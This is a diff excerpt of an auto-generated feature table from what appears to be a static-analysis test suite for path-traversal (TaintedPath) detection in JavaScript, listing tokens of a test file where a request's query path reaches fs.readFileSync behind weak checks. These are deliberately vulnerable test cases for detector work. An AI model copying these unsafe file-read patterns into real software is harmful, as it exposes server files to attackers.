isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:192:5:192:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:192:5:192:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:192:5:192:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:192:5:192:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:192:5:192:25 | fs.read ... c(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:192:5:192:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:192:5:192:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:192:8:192:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:192:8:192:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:192:8:192:19 | readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:192:8:192:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:192:8:192:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:192:21:192:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:192:21:192:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:192:21:192:24 | path | calleeImports | fs | @@ -8548,6 +74394,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:192:21:192:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:192:21:192:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:192:21:192:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:194:5:194:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:194:5:194:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:194:5:194:6 | fs | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:194:5:194:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:194:5:194:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:194:5:194:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:194:5:194:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:194:5:194:19 | fs.readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:194:5:194:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:194:5:194:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:194:5:194:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:194:5:194:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:194:5:194:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:194:5:194:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:194:5:194:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:194:5:194:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:194:5:194:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:194:5:194:25 | fs.read ... c(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:194:5:194:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:194:5:194:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:194:8:194:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:194:8:194:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:194:8:194:19 | readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:194:8:194:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:194:8:194:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:194:21:194:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:194:21:194:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:194:21:194:24 | path | calleeImports | fs | @@ -8557,6 +74428,41 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:194:21:194:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:194:21:194:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:194:21:194:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:196:7:196:26 | !path.includes('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:196:7:196:26 | !path.includes('..') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:196:7:196:26 | !path.includes('..') | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:196:7:196:26 | !path.includes('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:196:7:196:26 | !path.includes('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:196:7:196:58 | !path.i ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:196:7:196:58 | !path.i ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:196:7:196:58 | !path.i ... e(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:196:7:196:58 | !path.i ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:196:7:196:58 | !path.i ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:196:8:196:11 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:196:8:196:11 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:196:8:196:11 | path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:196:8:196:11 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:196:8:196:11 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:196:8:196:20 | path.includes | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:196:8:196:20 | path.includes | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:196:8:196:20 | path.includes | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:196:8:196:20 | path.includes | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:196:8:196:20 | path.includes | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:196:8:196:26 | exceptional return of path.includes('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:196:8:196:26 | exceptional return of path.includes('..') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:196:8:196:26 | exceptional return of path.includes('..') | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:196:8:196:26 | exceptional return of path.includes('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:196:8:196:26 | exceptional return of path.includes('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:196:8:196:26 | path.includes('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:196:8:196:26 | path.includes('..') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:196:8:196:26 | path.includes('..') | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:196:8:196:26 | path.includes('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:196:8:196:26 | path.includes('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:196:13:196:20 | includes | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:196:13:196:20 | includes | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:196:13:196:20 | includes | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:196:13:196:20 | includes | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:196:13:196:20 | includes | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:196:22:196:25 | '..' | CalleeFlexibleAccessPath | path.includes | | autogenerated/TaintedPath/normalizedPaths.js:196:22:196:25 | '..' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:196:22:196:25 | '..' | contextFunctionInterfaces | allowPath(requestPath, rootPath) | @@ -8565,6 +74471,61 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:196:22:196:25 | '..' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:196:22:196:25 | '..' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:196:22:196:25 | '..' | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:196:31:196:58 | !pathMo ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:196:31:196:58 | !pathMo ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:196:31:196:58 | !pathMo ... e(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:196:31:196:58 | !pathMo ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:196:31:196:58 | !pathMo ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:196:32:196:41 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:196:32:196:41 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:196:32:196:41 | pathModule | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:196:32:196:41 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:196:32:196:41 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:196:32:196:52 | pathMod ... bsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:196:32:196:52 | pathMod ... bsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:196:32:196:52 | pathMod ... bsolute | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:196:32:196:52 | pathMod ... bsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:196:32:196:52 | pathMod ... bsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:196:32:196:58 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:196:32:196:58 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:196:32:196:58 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:196:32:196:58 | exceptional return of pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:196:32:196:58 | exceptional return of pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:196:32:196:58 | pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:196:32:196:58 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:196:32:196:58 | pathMod ... e(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:196:32:196:58 | pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:196:32:196:58 | pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:196:43:196:52 | isAbsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:196:43:196:52 | isAbsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:196:43:196:52 | isAbsolute | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:196:43:196:52 | isAbsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:196:43:196:52 | isAbsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:197:5:197:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:197:5:197:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:197:5:197:6 | fs | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:197:5:197:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:197:5:197:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:197:5:197:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:197:5:197:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:197:5:197:19 | fs.readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:197:5:197:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:197:5:197:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:197:5:197:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:197:5:197:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:197:5:197:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:197:5:197:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:197:5:197:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:197:5:197:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:197:5:197:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:197:5:197:25 | fs.read ... c(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs 